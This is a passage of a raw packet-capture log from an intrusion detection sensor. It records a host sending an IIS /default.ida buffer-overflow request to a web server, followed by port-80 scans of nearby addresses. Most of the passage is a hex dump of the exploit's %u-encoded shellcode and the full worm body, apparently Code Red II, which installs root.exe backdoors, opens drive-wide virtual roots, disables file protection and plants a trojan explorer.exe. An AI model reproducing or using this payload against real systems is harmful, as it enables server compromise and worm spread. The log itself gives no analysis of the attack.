TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:19.477004 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x5EA 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:29444 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x88FE7065 Ack: 0xFAF596F6 Win: 0x2238 TcpLen: 20 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`.... 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&.. E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\... 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@ 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=... 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=........... C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00 ...T....u..~0... 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A ........F0...... 00 00 00 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 8B 1C 24 ..._________...$ FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50 .U.f.....8.....P FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50 .......j...P...P 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84 ..8...P.E..p.... 00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4 .....8....thS.U. FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00 .U..E.i.T...,... 81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 ..,............. 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00 .F4.E.Pj..u..... 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55 ......j.j..U.P.U D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00 .Ou..;...i.T.... 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A \&....\&.W.U.j.j 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45 ..U.j..U....F4)E 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0 .jd.U...<...P.U. 0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7 ...<...=....s... 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF .>......s.f..p.. FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00 ...f..r....P.d.. 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8 ...t...j.j.j..U. 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80 ...t..E.j.Th~f.. FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50 .u..U.Yj...p...P FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33 .u..U........tK3 DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF ..U.=3'..u?..h.. FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7 .......l........ 85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF .`........E...d. FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF ....h...Pj...`.. FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66 .Pj.j..U..j.Th~f 04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00 ...u..U.Y...u1.. 00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00 ...X-....j.h.... 50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00 P.u..U.=....u.j. 6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF j...\...P.u..U.. 75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81 u..U..........w. C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00 ..........xu.... F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06 ..`......d$.dg.. 00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26 ..Xa..dg.6..dg.& 00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50 ..f.;MZu..K<.<.P 45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C E..u..T.x...B..< 03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75 .KERNu..|..EL32u BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47 .3.I.r ...A..<.G 65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03 etPu..|..rocAu.. 4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03 J.I...J$........ 4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00 J.......D$$dg... 00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8 .Xa..Q....]..E.. 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 ....LoadLibraryA 00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43 ..u..U..E......C 72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF reateThread..u.. 55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63 U..E......GetTic 6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC kCount..u..U..E. E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55 .....Sleep..u..U F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst 65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 emDefaultLangID. FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65 .u..U..E......Ge 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 tSystemDirectory 41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00 A..u..U..E...... 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8 CopyFileA..u..U. 89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69 .E......GlobalFi 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45 ndAtomA..u..U..E D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41 ......GlobalAddA 74 6F 6D 41 tomA =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:19.892035 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2176 -> 137.189.97.52:80 TCP TTL:122 TOS:0x0 ID:29472 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8A8418BD Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:21.522217 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x5EA 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:29622 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x88FE7619 Ack: 0xFAF596F6 Win: 0x2238 TcpLen: 20 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_ 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E. E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u. FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U.. 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E.... 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E..... 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E.. 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U.. 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E..... 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname.. 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u. FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E..... 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx.. 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i... 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4.... C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t. C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................ E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................ E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ...... FF FF FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................ FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y.. 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........ 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t.. 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U.. BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD. 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj.... 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe... 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j.. 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\ 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\ 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe.. 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U... 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP......... FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@... 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%)......... 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................ 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ... 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@.............. 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@... 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................ 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ............... 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0... 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................ 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`.. 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... .... 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@............. 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............ 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@..... FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @.. 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @.. 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2... 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@....... 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@......h.$@.h 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h.... E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5. 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@... 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........ 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.....h.$@.h. 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@ 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@.. C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff. 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217.... 40 00 89 35 @..5 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:21.688050 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3B8 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:29623 IpLen:20 DgmLen:938 DF ***AP*** Seq: 0x88FE7BCD Ack: 0xFAF596F6 Win: 0x2238 TcpLen: 20 D0 24 40 00 FF 35 D0 24 40 00 68 D0 20 40 00 6A .$@..5.$@.h. @.j 01 6A 00 55 FF 35 D8 24 40 00 E8 19 00 00 00 C3 .j.U.5.$@....... FF 25 60 30 40 00 FF 25 64 30 40 00 FF 25 68 30 .%`0@..%d0@..%h0 40 00 FF 25 70 30 40 00 FF 25 74 30 40 00 FF 25 @..%p0@..%t0@..% 78 30 40 00 FF 25 7C 30 40 FC FC FC FC FC FC FC x0@..%|0@....... FC FC FC FC FC FC FC FC FC FC FC FC 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 5C 45 58 50 4C 4F 52 .........\EXPLOR 45 52 2E 45 58 45 00 00 00 53 4F 46 54 57 41 52 ER.EXE...SOFTWAR 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 E\Microsoft\Wind 6F 77 73 20 4E 54 5C 43 75 72 72 65 6E 74 56 65 ows NT\CurrentVe 72 73 69 6F 6E 5C 57 69 6E 6C 6F 67 6F 6E 00 00 rsion\Winlogon.. 00 53 46 43 44 69 73 61 62 6C 65 00 00 9D FF FF .SFCDisable..... FF 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 .SYSTEM\CurrentC 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 ontrolSet\Servic 65 73 5C 57 33 53 56 43 5C 50 61 72 61 6D 65 74 es\W3SVC\Paramet 65 72 73 5C 56 69 72 74 75 61 6C 20 52 6F 6F 74 ers\Virtual Root 73 00 00 00 00 2F 53 63 72 69 70 74 73 00 00 00 s..../Scripts... 00 2F 4D 53 41 44 43 00 00 2F 43 00 00 2F 44 00 ./MSADC../C../D. 00 63 3A 5C 2C 2C 32 31 37 00 00 00 00 64 3A 5C .c:\,,217....d:\ 2C 2C 32 31 37 FC FC FC FC FC FC FC FC FC FC FC ,,217........... FC FC FC FC FC FC FC FC FC FC FC FC FC FC 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 3C 30 00 00 00 00 00 00 00 00 00 00 84 30 ..<0...........0 00 00 60 30 00 00 4C 30 00 00 00 00 00 00 00 00 ..`0..L0........ 00 00 91 30 00 00 70 30 00 00 00 00 00 00 00 00 ...0..p0........ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9E 30 ...............0 00 00 A6 30 00 00 BE 30 00 00 00 00 00 00 C8 30 ...0...0.......0 00 00 DC 30 00 00 EE 30 00 00 FE 30 00 00 00 00 ...0...0...0.... 00 00 9E 30 00 00 A6 30 00 00 BE 30 00 00 00 00 ...0...0...0.... 00 00 C8 30 00 00 DC 30 00 00 EE 30 00 00 FE 30 ...0...0...0...0 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 ......KERNEL32.d 6C 6C 00 41 44 56 41 50 49 33 32 2E 64 6C 6C 00 ll.ADVAPI32.dll. 00 00 53 6C 65 65 70 00 00 00 47 65 74 57 69 6E ..Sleep...GetWin 64 6F 77 73 44 69 72 65 63 74 6F 72 79 41 00 00 dowsDirectoryA.. 00 00 57 69 6E 45 78 65 63 00 00 00 52 65 67 51 ..WinExec...RegQ 75 65 72 79 56 61 6C 75 65 45 78 41 00 00 00 00 ueryValueExA.... 52 65 67 53 65 74 56 61 6C 75 65 45 78 41 00 00 RegSetValueExA.. 00 00 52 65 67 4F 70 65 6E 4B 65 79 45 78 41 00 ..RegOpenKeyExA. 00 00 52 65 67 43 6C 6F 73 65 4B 65 79 FC FC FC ..RegCloseKey... FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 5E BF B9 05 00 00 6A .........^.....j 07 E8 10 00 00 00 64 3A 5C 65 78 70 6C 6F 72 65 ......d:\explore 72 2E 65 78 65 00 8B 04 24 88 18 FF 55 CC 83 F8 r.exe...$...U... FF 74 4D 89 85 4C FE FF FF AC 8A F8 38 3E 75 27 .tM..L......8>u' 6A 20 E8 23 00 00 00 00 00 00 00 00 00 00 00 00 j .#............ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 6A 01 56 FF B5 4C FE FF FF .......j.V..L... FF 55 C8 46 4F 75 C5 FF B5 4C FE FF FF FF 55 C4 .U.FOu...L....U. FE C3 80 FB 64 0F 86 4C F9 FF FF C3 61 C9 C2 04 ....d..L....a... 00 90 .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:22.715361 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2176 -> 137.189.97.52:80 TCP TTL:122 TOS:0x0 ID:29735 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8A8418BD Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:26.255122 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:29918 IpLen:20 DgmLen:40 DF *****R** Seq: 0x88FE7F4F Ack: 0x0 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:26.255740 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:29919 IpLen:20 DgmLen:40 *****R** Seq: 0x88FE7F4F Ack: 0x88FE7F4F Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:28.049292 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2361 -> 137.189.97.170:80 TCP TTL:122 TOS:0x0 ID:30048 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8B2255B8 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:30.094016 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2176 -> 137.189.97.52:80 TCP TTL:122 TOS:0x0 ID:30257 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8A8418BD Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:30.546878 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2440 -> 137.189.97.215:80 TCP TTL:122 TOS:0x0 ID:30271 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8B65DAE0 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:30.655495 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:30280 IpLen:20 DgmLen:40 *****R** Seq: 0x88FE7F4F Ack: 0x88FE7F4F Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:31.153570 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2361 -> 137.189.97.170:80 TCP TTL:122 TOS:0x0 ID:30336 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8B2255B8 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:32.876348 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:30454 IpLen:20 DgmLen:40 *****R** Seq: 0x88FE7F4F Ack: 0x88FE7F4F Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:32.880157 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:30456 IpLen:20 DgmLen:40 *****R** Seq: 0x88FE7F4F Ack: 0x88FE7F4F Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:33.038095 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:30472 IpLen:20 DgmLen:40 *****R** Seq: 0x88FE7F4F Ack: 0x88FE7F4F Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:33.619792 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2440 -> 137.189.97.215:80 TCP TTL:122 TOS:0x0 ID:30543 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8B65DAE0 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 